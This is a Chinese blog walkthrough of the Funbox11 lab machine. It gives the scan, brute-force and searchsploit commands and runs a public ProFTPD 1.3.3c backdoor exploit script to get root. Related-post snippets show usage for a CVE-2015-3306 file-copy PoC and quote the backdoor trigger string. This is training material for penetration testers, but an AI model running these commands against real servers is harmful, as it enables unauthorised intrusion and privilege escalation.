funbox11靶机(ProFTPD1.3.3c提权漏洞)

最新推荐文章于 2024-01-26 18:53:27 发布
最新推荐文章于 2024-01-26 18:53:27 发布
阅读量465 收藏
点赞数 1
分类专栏: Box系列 文章标签: git linux centos php bash
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_66299232/article/details/127835826
版权

环境准备

靶机链接:百度网盘 请输入提取码

提取码:tli0

虚拟机网络链接模式:桥接模式

攻击机系统:kali linux 2021.1

信息收集

1.探测目标靶机开放端口和服务

nmap -p- -A -T4 192.168.166.102

2.用gobuster进行目录扫描

gobuster dir -u http://192.168.1.102 \ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50 \ -x php,txt,html,js,php.bak,txt.bak,html.bak,json,git,git.bak,zip,zip.bak

漏洞利用

1.用smbmap登录smb服务,查找利用信息

smbmap -H 192.168.1.102

2.用wpscan暴力破解用户名密码

wpscan --url http://funbox11/ -e u -P /usr/share/wordlists/rockyou.txt

3.上面俩个利用点都失败 ,前面探测到21端口proftpd有版本号。

searchsploit proftpd

4.保存到当前目录,查看下,没啥大用。

searchsploit -m 15662.txt

权限提升

1.自己谷歌下版本漏洞可以找到利用的脚本

git clone GitHub - shafdo/ProFTPD-1.3.3c-Backdoor_Command_Execution_Automated_Script: A script to interact with the ProFTPD-1.3.3c inbuilt backdoor

2.执行后发现usage,给出执行格式

chmod +x proFTPD_1.3.3c_exploit.py

3.按照格式输出命令,成功进去root,轻松拿下!!!

python3 proFTPD_1.3.3c_exploit.py 192.168.1.106 192.168.1.102 21

魏钦6666
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
cpx_proftpd:漏洞利用工具 CVE-2015-3306
06-11
cpx_proftpd Daniel Aldana 针对漏洞利用的 PoC。 Vadim Melihow 报告的错误。 ###方法1: 用法: python cpx_proftp.py <IP> <REMOTE> <REMOTE> 前任: python cpx_proftp.py 127.0.0.1 /etc/passwd /var/www/pass.txt 然后尝试: http://127.0.0.1/pass.txt ###方法2: 用法: python cpx_proftp.py <IP> <REMOTE> 前任: python cpx_proftp.py 127.0.0.1 /var/www/html 然后尝试: http:
CTF渗透训练(笔记)
weixin_57536426的博客
12-26 673
将该请求发送至repeater页面并且修改文件名为要执行的PHP代码,点击go将请求发出,点击Render查看图形化的响应页面,其中包含代码执行的结果.利用远程代码执行漏洞下载木马,因为需要绕过防火墙的原因所以对要执行的代码进行base64形式的编码,将生成的木马放到web网站的主目录下面
渗透实战靶机3wp
0nc3的博客
11-07 398
目标IP:xxxx.95测试IP:xxxx.96测试环境:win10、kali等测试时间:2021.7.23-2021.7.26测试人员:ruanruanwordpress后台getshell,在线编辑位置尝试错误对wordpress后台常见的getshell方法不够熟练,都尝试下从菜刀直接反弹shell到kali失败,显示/bin/sh,语法错误webshell不是完整的交互式shell,通过bash -c 'xxx’解决找marlinspike密码时没有直接尝试用户名。
Funbox 11 靶机wp
m0_52496313的博客
08-27 465
Funbox 11 靶机wp
vulnhub -digitalworld.local: JOY (考点:ftp&ProFTPD漏洞/ linux提权知识)
冬萍子癸水
04-24 1167
https://www.vulnhub.com/entry/digitalworldlocal-joy,298/ nat网络 arp-scan -l 比平常多出来的ip就是靶机了 nmap 很多端口,25和110想到smtp枚举邮件用户,和邮件查看。22想到ssh登录139 445想到smb查看敏感文件,21想到ftp查看敏感文件。 PORT STATE SERVICE VER...
FTP服务proFTPD1.3.3C漏洞利用
qq_62272017的博客
06-22 454
FTP服务漏洞利用
FTP服务后门利用
qq_39687353的博客
04-11 932
FTP服务后门利用 1.什么是 FTP? 是文件传输协议的简称。用于Internet上的控制文件的双向传输。同时,它也是一个应用程序(Application)。用户可以通过它把自己的PC机与世界各地所有运行FTP协议的服务器相连,访问服务器上的大量程序和信息。 FTP 是因特网网络上历史最悠久的网络工具,从 1971 年由 A KBHUSHAN 提出第一个 FTP 的RFC(RFC114) 至今近半个世纪来,FTP 凭借其独特的优势一直都是因特网中最重要、最广泛的服务之一。 2.searchsploit
[转帖] 小心ProFTPD 1.3.3c源码被人插入后门
weixin_34384681的博客
11-12 630
http://www.exploit-db.com/exploits/15662/这里说到,rsync.proftpd.org 服务器存在一个漏洞,被黑客攻击得手,然后修改了官方提供用户下载的proftpd源码包,在代码中加入了后门! 注意看这里 if (strcmp(target, "ACIDBITCHEZ") == 0) { setuid...
vluhub~funbox11全网最详细
weixin_68119378的博客
03-24 221
全网最详细靶机打靶过程
Vulnhub靶机FunBox11
最新发布
qq_48904485的博客
01-26 444
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机FunBox11(10.0.2.36)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/funbox-scriptkiddie,725/
ifunbox setup v4.4 资源管理神器
04-11
ios/iphone 资源管理神器 ifunbox 的 windows 版 包含: ifunbox_setup_4.4.exe 使用: 直接安装,连接iphone,即可管理iphone设备的文件
ifunbox_setup_4.2.exe
02-22
ifunbox_setup_4.2.exe
iFunBox下载 iFunbox v4.0 Build 4106.1352 Preview
10-16
iFunBox是一款小巧的iPhone文件管理软件。iFunBox中文版界面类似于windows资源管理器,以简练时尚的窗口方式浏览和管理iPhone、iPad、iPod touch上的文件和目录。iFunBox既可以在手机与电脑之间
iFunBox for iOS
06-02
iFunBox是一个iOS系统的文件浏览器,安装在Mac端,浏览iOS系统全面貌,就像Finder一样,iOS需要越狱,官方下载地址http://www.i-funbox.com/en_download.html
iFunBox.exe
07-02
iFunBox.exe
【内网渗透】vulnhub三个基础靶场wp
weixin_51614272的博客
09-15 2663
ssh、msf、webdav、linux、kali、basic_pentesting_1、Me-and-My-Girlfriend-1、narak
Vulnhub靶场之Funbox
qq_69775412的博客
11-08 574
信息收集 -> 获取目标IP端口扫描 -> 获取目标IP的端口开放情况及服务版本信息Web端口 -> 目录扫描获取敏感信息,如果是CMS就通过版本信息搜索历史漏洞,如果不是就手工测试其他服务端口 -> 通过服务版本在漏洞库搜索相关漏洞信息通过FTP漏洞获取ROOT权限。之所以说这道题简单,是因为msf攻击成功后直接是root权,不需要其他的提权操作,所以说对新手来说的话还是比较简单的。
vulnhub- Symfonos 2 (考点:smb & ProFTPD & 端口转发 & librenms & mysql提权
冬萍子癸水
04-27 603
https://www.vulnhub.com/entry/symfonos-2,331/ nat网络 arp-scan -l 比平常扫出来多的ip就是靶机 nmap 看到21要想到ftp进去找敏感文件。但这里明显提示了proftpd的版本,1.3.5的是有漏洞的。 参考这个类似的靶机joy 22要想到可能的ssh登录或破解 80进web搜集信息 139,445smb进去找敏感文件 PORT ...
TRY HACK ME|Kenobi 「利用Samba+ProFtpd提权
AKAHRZ的博客
04-02 4116
TRY HACK ME 渗透测试靶场,以基础为主层层深入,知识点讲解详细,对于想实现从零到一飞跃的白客,TRY HACK ME无非是最好的选择。而网络上资源良莠不齐,好的资源难找的一逼。因此,今天起我将与大家一起详细学习THM重要的ROOM里的内容,力求让每个人都能理解、掌握其中的内容,让我们一起学习、一起进步、一起GET THE FLAG! Kenobi 「利用Samba+ProFtpd提权」THM靶场:KenobiTASK1 部署机器TASK2 为共享枚举 SambaTASK3 使用 ProFtp.
替换itools 的软件
08-09
替换iTools的软件有多种选择,以下是其中几个常用的替代方案: 1. 3uTools:这是一款iOS设备管理工具,类似于iTools,可以帮助用户管理iPhone、iPad和iPod touch等设备,包括文件传输、应用安装、音乐管理、数据备份和恢复等功能。3uTools界面简洁易用,支持多国语言,还提供越狱刷机等高级功能。 2. iFunBox:iFunBox是一款免费的应用程序和文件管理工具,可以在Windows和Mac操作系统上使用。它可以让用户在设备和电脑之间轻松传输文件、安装应用程序、管理音乐、照片和视频等。iFunBox界面直观,操作简单,适合普通用户和开发者使用。 3. AnyTrans:AnyTrans是一款全能的iOS设备管理工具,支持文件传输、备份、恢复、导入和导出多种数据类型,包括音乐、视频、照片、联系人、短信等等。它还具有转换音频视频格式、下载在线视频、管理云存储等实用功能。AnyTrans界面美观,功能强大,是一款综合性的iTools替代品。 4. Syncios:Syncios是一款免费的iOS和Android设备管理工具,它可以帮助用户进行文件传输、备份、恢复、应用安装、音乐管理等操作。Syncios还支持一键转移数据、视频下载、屏幕录制等实用功能,几乎涵盖了用户对设备管理的各类需求。 这些软件都有各自的特点和优势,用户可以根据自己的需求和偏好选择合适的替代品。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值